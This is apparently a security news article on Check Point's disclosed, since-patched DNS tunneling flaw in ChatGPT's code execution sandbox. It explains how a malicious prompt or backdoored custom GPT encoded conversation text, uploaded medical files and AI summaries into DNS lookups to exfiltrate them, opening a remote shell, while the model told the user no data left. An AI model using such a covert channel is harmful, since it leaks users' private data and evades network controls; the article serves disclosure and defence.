Mar 31, 2026 · 6 min read
A Hidden Channel in ChatGPT Let Attackers Steal Your Conversations Without a Trace
Check Point researchers found a DNS tunneling flaw in ChatGPT's code execution environment that could silently exfiltrate uploaded files, medical data, and private messages to remote servers.
The Vulnerability
Security researchers at Check Point Research discovered that ChatGPT's code execution environment, the sandboxed container where the AI runs Python code and analyzes uploaded files, had a hidden outbound communication path to the public internet. While OpenAI designed the container to block direct network requests, it left DNS resolution completely uncontrolled.
That gap was enough. By encoding sensitive data into DNS subdomain labels, an attacker could smuggle information out of the sandbox through normal recursive DNS lookups, bypassing every other network restriction OpenAI had put in place.
How the Attack Worked
The technique is called DNS tunneling. Instead of sending data over a blocked HTTP connection, the attacker encodes stolen information into what looks like a routine domain name lookup. For example, a query for stolen-data-fragment.attacker-domain.com appears like normal DNS traffic but carries exfiltrated content in the subdomain portion.
A single malicious prompt was all it took to activate the channel. Once triggered, every subsequent user message became a potential data source. The attacker could target raw conversation text, content extracted from uploaded files, and even the AI's own generated summaries and assessments.
Worse, the channel was bidirectional. Attackers could send instructions through DNS responses and receive results back, effectively establishing remote shell access inside the Linux environment that ChatGPT uses for code execution.
The Medical Data Demonstration
Check Point built a proof of concept using a third party GPT configured as a "personal doctor." A user uploaded a PDF containing laboratory test results with personal identifiers, then described their symptoms and asked for analysis. The GPT processed everything normally and provided medical advice.
Behind the scenes, the patient's name, medical data, and the AI's health assessment were silently transmitted to an attacker controlled server. When the user explicitly asked ChatGPT whether it had sent their data externally, it answered confidently that it had not, explaining that the file was "only stored in a secure internal location."
The AI was not lying in the traditional sense. It simply could not detect that DNS queries constituted an external data transfer, because it was never designed to treat DNS as a communication channel.
What Could Have Been Stolen
Any data processed through ChatGPT's code execution environment was at risk:
- Private conversation messages
- Uploaded documents including contracts, financial statements, and medical records
- AI generated summaries and analysis of sensitive material
- Personal identifiers extracted from files
For organizations using ChatGPT to process regulated data, the implications extend to GDPR, HIPAA, and financial compliance violations. A backdoored custom GPT could have silently harvested data from every user who interacted with it.
OpenAI's Response
OpenAI patched the vulnerability on February 20, 2026, closing the DNS tunneling path in the code execution runtime. The company stated it had already identified the underlying issue internally. Check Point publicly disclosed the flaw on March 30, 2026, after confirming the fix was in place. There is no evidence the vulnerability was exploited maliciously before patching.
What This Means for AI Users
This vulnerability is a reminder that AI tools process data in environments with their own attack surfaces. Even when a platform appears sandboxed, infrastructure level gaps like uncontrolled DNS can create exfiltration paths that neither the AI nor the user can detect.
Practical steps to reduce risk:
- Avoid uploading documents containing personal identifiers, medical data, or financial details to AI chatbots
- Be cautious with third party GPTs and custom AI applications from unknown developers
- If your organization uses AI for sensitive data processing, ensure your deployment includes network monitoring that covers DNS traffic
- Review ChatGPT's privacy settings and disable features you do not need
The broader pattern is consistent across the tech industry: companies build powerful tools, secure the obvious attack vectors, and leave less visible channels unprotected. Whether it is email tracking pixels smuggling data through image loads or AI chatbots leaking data through DNS queries, the principle is the same. If a channel exists, someone will eventually use it to move data where it should not go.